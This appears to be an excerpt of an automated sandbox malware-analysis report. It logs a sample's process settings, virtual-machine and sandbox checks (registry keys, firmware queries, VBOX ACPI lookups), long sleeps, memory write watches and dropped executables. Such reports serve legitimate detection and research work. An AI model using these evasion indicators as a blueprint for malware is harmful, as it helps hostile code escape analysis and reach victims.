Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Query firmware table information (likely to detect VMs)

Source: C:\Windows\System32\svchost.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	System information queried: FirmwareTableInformation

Tries to delay execution (extensive OutputDebugStringW loop)

Source: C:\Windows\System32\svchost.exe

Section loaded: OutputDebugStringW count: 128

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: PZ3hKWPffUrXuh6Gjn77Ivv1.exe, 00000008.00000002.1742610833.000000000300E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOK

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Memory allocated: 233C0730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 28A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 6480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 7480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 7920000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 8920000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 8BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 9BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 78E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 9210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: A210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: B210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: C210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 78E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 6480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 9210000 memory reserve \| memory write watch	Jump to behavior

Contains capabilities to detect virtual machines

Source: C:\Windows\System32\svchost.exe	File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599889	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599775	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599450	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599336	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598789	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598527	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598420	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597982	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596926	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596757	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596655	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596529	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596122	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595669	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595118	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595013	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594787	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594655	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594544	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594108	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 593885	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 593781	Jump to behavior
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Thread delayed: delay time: 300000
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Thread delayed: delay time: 300000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4850	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5010	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 3982	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 5750	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1593
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 423

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\wPxPcov2_iRQt91bGzfyQLn0.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\IzXa7ArplEUILx8JLGVvIms1.exe	Jump to dropped file
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\360TS_Setup.exe (copy)	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\default_s[1].exe	Jump to dropped file
